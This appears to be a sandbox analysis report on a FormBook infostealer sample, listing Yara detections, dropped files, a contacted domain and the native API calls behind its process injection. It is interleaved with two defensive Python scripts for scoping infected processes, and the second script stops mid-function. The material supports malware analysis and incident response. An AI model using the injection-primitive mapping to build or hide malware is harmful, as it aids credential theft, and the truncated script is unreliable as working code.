Source: Yara match | File source: 0000001C.00000002.558411329.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.550726466.00000000042F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.560919847.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.568017241.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.570354092.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.571182015.0000000001940000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.362545520.0000000003C5A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.624361067.0000000000D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.362367375.0000000003AD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.551244965.00000000043FA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.391628167.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.sample.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.user8pl8ft.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.user8pl8ft.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.user8pl8ft.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.user8pl8ft.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.sample.exe.400000.0.raw.unpack, type: UNPACKEDPE
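Every Yara hit above names either a memory dump (the long dotted .sdmp id) or an unpacked PE (the short .unpack id), and the same FormBook code turns up under a dozen process IDs. The script below is an added example, not something from the report or from Joe Sandbox tooling. It parses both id forms, learns image names from the string rows that pair a process name with one of its dump ids (the only place the report ties a PID to a name), and summarises which processes hold FormBook in executable memory, which is the list an incident responder needs for scoping. Two assumptions are labelled in the code: the first field of a dump id is the PID in hex (0000001C is 28, the same PID that appears as 28.2.user8pl8ft.exe.400000.0.unpack), and the fifth field follows the Windows PAGE_* protection constants (0x40 PAGE_EXECUTE_READWRITE, 0x04 PAGE_READWRITE). The other fields are carried through without interpretation.

```python
import re
from collections import defaultdict

# Constructed input: Yara rows copied from the FormBook section above plus
# two string rows that pair a process name with a dump id.
ROWS = r"""
Source: Yara match File source: 0000001C.00000002.563585600.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.565851444.0000000003B8A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.625534463.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.571218555.0000000001970000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.391628167.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.550726466.00000000042F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.560919847.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.570354092.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.362545520.0000000003C5A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.624361067.0000000000D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.sample.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.user8pl8ft.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.user8pl8ft.exe.400000.0.unpack, type: UNPACKEDPE
Source: sample.exe, 00000000.00000002.362051090.0000000002AD1000.00000004.00000001.sdmp, user8pl8ft.exe, 00000019.00000002.548157674.0000000003271000.00000004.00000001.sdmp, user8pl8ft.exe, 0000001A.00000002.562366464.0000000002A01000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wlanext.exe, 00000003.00000002.628152195.0000000003C69000.00000004.00000001.sdmp String found in binary or memory: http://www.willowbeemasks.com
"""

# <pid hex>.<phase>.<dump no>.<base>.<protect>.<kind>.sdmp  (field meaning is an assumption)
DUMP_RE = re.compile(
    r"\b([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp\b")
# <pid>.<phase>.<image name>.<base>.<index>[.raw].unpack
UNPACK_RE = re.compile(
    r"\b(\d+)\.(\d+)\.([\w-]+\.(?:exe|dll))\.([0-9A-Fa-f]+)\.(\d+)(?:\.raw)?\.unpack\b")
# "<image name>, <dump id>" as written in the string rows
NAMED_RE = re.compile(r"([\w-]+\.exe), ([0-9A-F]{8})\.[0-9A-F]{8}\.")

# Assumption: the protect field uses the Windows PAGE_* constants.
EXECUTABLE_PROTECT = {0x10, 0x20, 0x40, 0x80}


def parse_dump_id(text):
    """Parse a memory dump id; the PID is hex (0000001C -> 28)."""
    m = DUMP_RE.search(text)
    if not m:
        return None
    pid, phase, dump_no, base, protect, kind = m.groups()
    protect = int(protect, 16)
    return {"pid": int(pid, 16), "phase": int(phase, 16), "dump": int(dump_no),
            "base": int(base, 16), "protect": protect, "kind": kind,
            "name": None, "executable": protect in EXECUTABLE_PROTECT}


def parse_unpack_id(text):
    """Parse an unpacked PE id; the PID is decimal and the image is named."""
    m = UNPACK_RE.search(text)
    if not m:
        return None
    pid, phase, name, base, index = m.groups()
    return {"pid": int(pid), "phase": int(phase), "name": name,
            "base": int(base, 16), "index": int(index), "executable": True}


def summarize(text):
    """Per PID: image name where the report reveals it, and the bases of the
    executable and non-executable regions that matched the FormBook rules."""
    names = {int(m.group(2), 16): m.group(1) for m in NAMED_RE.finditer(text)}
    hits = defaultdict(lambda: {"name": None, "exec_regions": set(), "data_regions": set()})
    for line in text.splitlines():
        if "Yara match" not in line:
            continue
        rec = parse_unpack_id(line) or parse_dump_id(line)
        if rec is None:
            continue
        if rec.get("name"):
            names.setdefault(rec["pid"], rec["name"])
        key = "exec_regions" if rec["executable"] else "data_regions"
        hits[rec["pid"]][key].add(rec["base"])
    for pid, entry in hits.items():
        entry["name"] = names.get(pid, "?")
    return dict(hits)


def executable_pids(summary):
    """Processes that carry FormBook code in executable memory."""
    return sorted(pid for pid, e in summary.items() if e["exec_regions"])


def data_only_pids(summary):
    """Processes where the rules only hit non-executable memory (decrypted
    strings or config in a heap, not necessarily live code)."""
    return sorted(pid for pid, e in summary.items() if not e["exec_regions"])


if __name__ == "__main__":
    for pid, e in sorted(summarize(ROWS).items()):
        print(f"pid {pid:>3} {e['name']:<16} exec={[hex(b) for b in sorted(e['exec_regions'])]}"
              f" data={[hex(b) for b in sorted(e['data_regions'])]}")
```

Processes that show up only with PAGE_READWRITE hits deserve a second look before being cleared: a heap full of FormBook strings may be the injector's staging copy rather than a running instance, and the distinction decides whether a PID goes on the kill list or only on the evidence list.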

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\wlanext.exe | Dropped file: C:\Users\user\AppData\Roaming\J4833--2\J48logri.ini
Source: C:\Windows\SysWOW64\wlanext.exe | Dropped file: C:\Users\user\AppData\Roaming\J4833--2\J48logrv.ini
Malicious sample detected (through community Yara rule)
Source: 0000001C.00000002.563585600.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.563585600.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001A.00000002.565851444.0000000003B8A000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001A.00000002.565851444.0000000003B8A000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.625534463.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.625534463.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.571218555.0000000001970000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.571218555.0000000001970000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001A.00000002.564732241.0000000003A85000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001A.00000002.564732241.0000000003A85000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.392011804.00000000012E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.392011804.00000000012E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.391924583.00000000012B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.391924583.00000000012B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.561282015.0000000001970000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.561282015.0000000001970000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.558411329.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.558411329.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.550726466.00000000042F5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.550726466.00000000042F5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.560919847.0000000000A30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.560919847.0000000000A30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.568017241.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.568017241.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000021.00000002.570354092.0000000000E70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000021.00000002.570354092.0000000000E70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.571182015.0000000001940000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.571182015.0000000001940000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.362545520.0000000003C5A000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.362545520.0000000003C5A000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.624361067.0000000000D40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.624361067.0000000000D40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.362367375.0000000003AD9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.362367375.0000000003AD9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.551244965.00000000043FA000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.551244965.00000000043FA000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.391628167.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.391628167.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.sample.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.sample.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 28.2.user8pl8ft.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 28.2.user8pl8ft.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 28.2.user8pl8ft.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 28.2.user8pl8ft.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 31.2.user8pl8ft.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 31.2.user8pl8ft.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 31.2.user8pl8ft.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 31.2.user8pl8ft.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.sample.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.sample.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_00419CA0 NtCreateFile
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_00419D50 NtReadFile
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_00419DD0 NtClose
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_00419E80 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_00419C9C NtCreateFile
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_00419D4A NtReadFile
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_00419DCA NtClose
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_00419E7A NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_018199A0 NtCreateSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_018198F0 NtReadVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819840 NtDelayExecution, LdrInitializeThunk
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819A00 NtProtectVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819A20 NtResumeThread, LdrInitializeThunk
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819A50 NtCreateFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_018195D0 NtClose, LdrInitializeThunk
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819540 NtReadFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_018197A0 NtUnmapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_018196E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_018199D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819950 NtQueueApcThread
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_018198A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819820 NtEnumerateKey
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_0181B040 NtSuspendThread
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_0181A3B0 NtGetContextThread
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819B00 NtSetValueKey
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819A10 NtQuerySection
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_018195F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_0181AD30 NtSetContextThread
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819560 NtWriteFile
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819FE0 NtCreateMutant
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_0181A710 NtOpenProcessToken
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819730 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819760 NtOpenProcess
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_0181A770 NtOpenThread
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819770 NtSetInformationFile
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_018196D0 NtCreateKey
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819650 NtQueryValueKey
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01819670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629B00 NtSetValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629A50 NtCreateFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_036299A0 NtCreateSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629840 NtDelayExecution, LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629770 NtSetInformationFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629FE0 NtCreateMutant, LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629650 NtQueryValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629610 NtEnumerateValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_036296E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_036296D0 NtCreateKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629560 NtWriteFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629540 NtReadFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_036295D0 NtClose, LdrInitializeThunk
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_0362A3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629A20 NtResumeThread
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629A10 NtQuerySection
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629950 NtQueueApcThread
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_036299D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_0362B040 NtSuspendThread
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629820 NtEnumerateKey
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_036298F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_036298A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629760 NtOpenProcess
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_0362A770 NtOpenThread
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_0362A710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_036297A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_03629520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_0362AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_036295F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02FE9E80 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02FE9CA0 NtCreateFile
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02FE9DD0 NtClose
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02FE9D50 NtReadFile
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02FE9E7A NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02FE9C9C NtCreateFile
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02FE9DCA NtClose
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02FE9D4A NtReadFile
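The native-call rows above list the Nt* functions twice per process: a few call sites inside the sample's own image region (0x0041xxxx in sample.exe, 0x02FE9xxx in wlanext.exe) and a dense run of stubs at 0x0181xxxx and 0x0362xxxx, many of them paired with LdrInitializeThunk. For every function the low 16 bits of the address are the same in both processes, which is consistent with one blob being copied into the other process and relocated, and with the report's own findings that the sample maps memory into another process and hooks user-mode function prologues. The script below is an added example, not taken from the report or from Joe Sandbox tooling. It parses a constructed subset of those rows, fingerprints each 64 KB region by (function, offset), reports regions that reappear at a different base in another process, and flags which injection primitives each process has call sites for. The technique names and the API sets behind them are a heuristic of mine, not the report's signature logic.

```python
import re
from collections import defaultdict
from itertools import combinations

# Constructed input: a subset of the "Code function" rows above. Each row
# carries a <pid>_<phase>_<address> id; sample.exe is PID 1, wlanext.exe PID 3.
ROWS = r"""
Source: C:\Users\user\Desktop\sample.exe Code function: 1_2_00419CA0 NtCreateFile,1_2_00419CA0
Source: C:\Users\user\Desktop\sample.exe Code function: 1_2_00419E80 NtAllocateVirtualMemory,1_2_00419E80
Source: C:\Users\user\Desktop\sample.exe Code function: 1_2_018199A0 NtCreateSection,LdrInitializeThunk,1_2_018199A0
Source: C:\Users\user\Desktop\sample.exe Code function: 1_2_01819780 NtMapViewOfSection,LdrInitializeThunk,1_2_01819780
Source: C:\Users\user\Desktop\sample.exe Code function: 1_2_018197A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_018197A0
Source: C:\Users\user\Desktop\sample.exe Code function: 1_2_01819A20 NtResumeThread,LdrInitializeThunk,1_2_01819A20
Source: C:\Users\user\Desktop\sample.exe Code function: 1_2_018199D0 NtCreateProcessEx,1_2_018199D0
Source: C:\Users\user\Desktop\sample.exe Code function: 1_2_01819950 NtQueueApcThread,1_2_01819950
Source: C:\Users\user\Desktop\sample.exe Code function: 1_2_018198A0 NtWriteVirtualMemory,1_2_018198A0
Source: C:\Users\user\Desktop\sample.exe Code function: 1_2_0181AD30 NtSetContextThread,1_2_0181AD30
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02FE9CA0 NtCreateFile,3_2_02FE9CA0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02FE9E80 NtAllocateVirtualMemory,3_2_02FE9E80
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_036299A0 NtCreateSection,LdrInitializeThunk,3_2_036299A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03629780 NtMapViewOfSection,LdrInitializeThunk,3_2_03629780
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_036297A0 NtUnmapViewOfSection,3_2_036297A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03629A20 NtResumeThread,3_2_03629A20
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_036299D0 NtCreateProcessEx,3_2_036299D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03629950 NtQueueApcThread,3_2_03629950
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_036298A0 NtWriteVirtualMemory,3_2_036298A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0362AD30 NtSetContextThread,3_2_0362AD30
"""

# <pid>_<phase>_<address> followed by a comma separated list of call names.
# The trailing repeat of the id is not part of the match, so the regex works
# whether or not a report copy still carries it.
ROW_RE = re.compile(r"\b(\d+)_(\d+)_([0-9A-Fa-f]{8})[ \t]+([A-Za-z]\w*(?:,[A-Za-z]\w*)*)")

# Heuristic: the Nt* call sites a process needs for each injection primitive.
TECHNIQUES = {
    "process hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "APC injection": {"NtWriteVirtualMemory", "NtQueueApcThread"},
    "section mapping": {"NtCreateSection", "NtMapViewOfSection"},
}


def parse_rows(text):
    """Return (pid, address, [call names]) for every row that names calls."""
    records = []
    for line in text.splitlines():
        m = ROW_RE.search(line)
        if m:
            pid, _phase, addr, calls = m.groups()
            records.append((int(pid), int(addr, 16), calls.split(",")))
    return records


def stub_tables(records):
    """Map (pid, 64 KB region base) -> frozenset of (Nt function, offset)."""
    tables = defaultdict(set)
    for pid, addr, calls in records:
        for name in calls:
            if name.startswith("Nt"):
                tables[(pid, addr & ~0xFFFF)].add((name, addr & 0xFFFF))
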